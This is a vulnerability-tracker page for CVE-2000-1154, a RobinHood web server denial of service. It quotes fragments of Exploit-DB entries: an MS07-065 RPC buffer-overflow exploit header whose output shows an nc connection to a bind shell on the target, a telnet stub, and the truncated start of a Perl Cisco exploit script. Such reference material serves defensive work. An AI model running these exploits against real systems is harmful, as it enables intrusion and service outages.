CVE-2000-1154
published 2001-01-09CVE-2000-1154: RHConsole in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request.
PriorityP416medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
2.48%
82.5th percentile
RHConsole in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joe_kloss | robinhood | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
exploitdb·2007-12-18
CVE-2007-3039 Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
---
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown soc
Exploit-DB
Joe Kloss RobinHood 1.1 - Remote Buffer Overflow
exploitdb·2000-11-14
CVE-2000-1154 Joe Kloss RobinHood 1.1 - Remote Buffer Overflow
Joe Kloss RobinHood 1.1 - Remote Buffer Overflow
---
source : https://www.securityfocus.com/bid/1944/info
RobinHood is a HTTP/1.1 web server based upon libHTTP and is designed for the BeOS platform.
Improper bounds checking exists in code that handles requests (RHCWindow.cpp and RHLogger.cpp). The components RHConsole and RHDaemon will cease operations upon receiving a request consisting of over 4078 bytes. If RobinHood were to encounter such requests repeatedly, a prolonged denial of service attack may result. Restarting the application is required in order to regain normal functionality.
$ telnet target 80
Trying target...
Connected to target.
Escape character is '^]'.
Exploit-DB
Cisco IOS 11.x/12.x - HTTP %%
exploitdb·2000-04-26
CVE-2000-0380 Cisco IOS 11.x/12.x - HTTP %%
Cisco IOS 11.x/12.x - HTTP %%
---
#source: https://www.securityfocus.com/bid/1154/info
#
#A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
#
#!/usr/bin/perl
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##
##
# Modules
##
use Socket;
use IO::Socket;
##
# Main
##
$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1
No writeups or analysis indexed.
2001-01-09
Published